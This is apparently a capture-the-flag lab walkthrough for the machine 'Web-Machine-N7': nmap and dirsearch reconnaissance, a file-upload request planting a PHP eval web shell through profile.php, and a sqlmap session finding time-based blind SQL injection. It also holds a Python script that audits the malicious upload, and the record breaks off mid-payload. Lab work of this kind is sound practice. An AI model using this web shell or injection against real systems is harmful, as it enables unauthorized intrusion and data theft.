Web-Machine-N7

$ sudo nmap -sP 192.168.0.1/24  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00048s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.18s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.19s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.18s latency).
MAC Address: 2A:86:BB:96:BD:6C (Unknown)
Nmap scan report for 192.168.0.107
Host is up (0.00013s latency).
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00066s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.93 seconds
$ sudo nmap -sV -sC -A 192.168.0.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:32 CST
Nmap scan report for 192.168.0.107
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.46 (Debian)
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.0.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
$ ./dirsearch.py -u 192.168.0.107

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11305

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-21_04-45-34.txt

Target: http://192.168.0.107/

[04:45:34] Starting: 
[04:45:35] 403 -  278B  - /.ht_wsr.txt
[04:45:35] 403 -  278B  - /.htaccess.bak1
[04:45:35] 403 -  278B  - /.htaccess.save
[04:45:35] 403 -  278B  - /.htaccess.sample
[04:45:35] 403 -  278B  - /.htaccess.orig
[04:45:35] 403 -  278B  - /.htaccessBAK
[04:45:35] 403 -  278B  - /.htaccessOLD
[04:45:35] 403 -  278B  - /.htaccessOLD2
[04:45:35] 403 -  278B  - /.htaccess_extra
[04:45:35] 403 -  278B  - /.htaccess_orig
[04:45:35] 403 -  278B  - /.htaccess_sc
[04:45:35] 403 -  278B  - /.htm
[04:45:35] 403 -  278B  - /.html
[04:45:35] 403 -  278B  - /.htpasswd_test
[04:45:35] 403 -  278B  - /.htpasswds
[04:45:35] 403 -  278B  - /.httr-oauth
[04:45:36] 403 -  278B  - /.php
[04:45:47] 200 -    2KB - /index.html
[04:45:48] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[04:45:53] 200 -    1KB - /profile.php
[04:45:54] 403 -  278B  - /server-status
[04:45:54] 403 -  278B  - /server-status/

Task Completed

$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -f .html --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 1323275

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-20_21-10-10.txt

Target: http://192.168.0.107/

[21:10:10] Starting: 
[21:10:10] 200 -    2KB - //
[21:10:10] 200 -    1KB - /profile.php
[21:10:11] 200 -    2KB - /index.html
[21:10:18] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[21:11:03] 200 -  279B  - /exploit.html
POST /profile.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------390266645724629296494056176300
Content-Length: 258
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/exploit.html
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------390266645724629296494056176300
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/x-php

<?php @eval($_POST['hacker']); ?>

-----------------------------390266645724629296494056176300--
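The multipart upload above is what profile.php accepted. As an added example (not code from this write-up or from the target's profile.php), here is a Python audit that parses such a request and lists why an upload handler should reject it: the extension is not on an image allowlist, the declared type is not an image type, and the body carries a PHP open tag. The allowlists and the request builder are assumptions; the captured request is rebuilt inline from its parts as constructed sample input.

```python
import re

BOUNDARY = "---------------------------390266645724629296494056176300"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}               # assumed: avatar uploads only
ALLOWED_TYPES = {"image/jpeg", "image/png", "image/gif"}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

def make_request(filename, ctype, data, boundary=BOUNDARY):
    # one-file multipart POST to /profile.php (constructed sample input)
    d = b"--" + boundary.encode()
    body = b"\r\n".join([d, b'Content-Disposition: form-data; name="file"; filename="%s"' % filename.encode(),
                         b"Content-Type: " + ctype.encode(), b"", data, d + b"--", b""])
    return b"\r\n".join([b"POST /profile.php HTTP/1.1", b"Host: 192.168.0.107",
                         b"Content-Type: multipart/form-data; boundary=" + boundary.encode(),
                         b"Content-Length: %d" % len(body), b"", body])

def _headers(block):
    # 'Name: value' lines -> lower-cased dict; serves both request and part headers
    return {k.strip().lower().decode(): v.strip().decode(errors="replace")
            for k, sep, v in (line.partition(b":") for line in block.split(b"\r\n")) if sep}

def parse_parts(body, boundary):
    # yield (headers, data) per part; data drops the CRLF that precedes the next delimiter
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):                       # closing delimiter
            break
        phead, _, pdata = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        yield _headers(phead), (pdata[:-2] if pdata.endswith(b"\r\n") else pdata)

def audit_upload(raw_request):
    # return the reasons the upload should be rejected; an empty list means it passed
    head, _, body = raw_request.partition(b"\r\n\r\n")
    m = re.search(r'boundary="?([^";]+)', _headers(head).get("content-type", ""))
    if not m:
        return ["not a multipart/form-data request"]
    findings = []
    for ph, data in parse_parts(body, m.group(1)):
        fn = re.search(r'filename="([^"]*)"', ph.get("content-disposition", ""))
        if not fn:
            continue                                      # ordinary form field, not a file
        name, ctype = fn.group(1), ph.get("content-type", "").lower()
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext not in ALLOWED_EXT:
            findings.append(f"{name}: extension .{ext} not in allowlist")
        if ctype not in ALLOWED_TYPES:
            findings.append(f"{name}: declared type {ctype!r} not allowed")
        if PHP_OPEN_TAG.search(data):                     # content check, independent of the name
            findings.append(f"{name}: body contains a PHP open tag")
    return findings

CAPTURED = make_request("2.php", "application/x-php", b"<?php @eval($_POST['hacker']); ?>")  # the request above
```

The content check is the one that still fires when the name and declared type look harmless, which is why it is kept separate from the allowlist checks.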
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbs --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:49 /2022-03-20/

[21:57:49] [INFO] testing connection to the target URL
[21:57:49] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[21:57:55] [INFO] resuming back-end DBMS 'mysql' 
[21:57:55] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...8rdGVZNWxv'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pass (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jL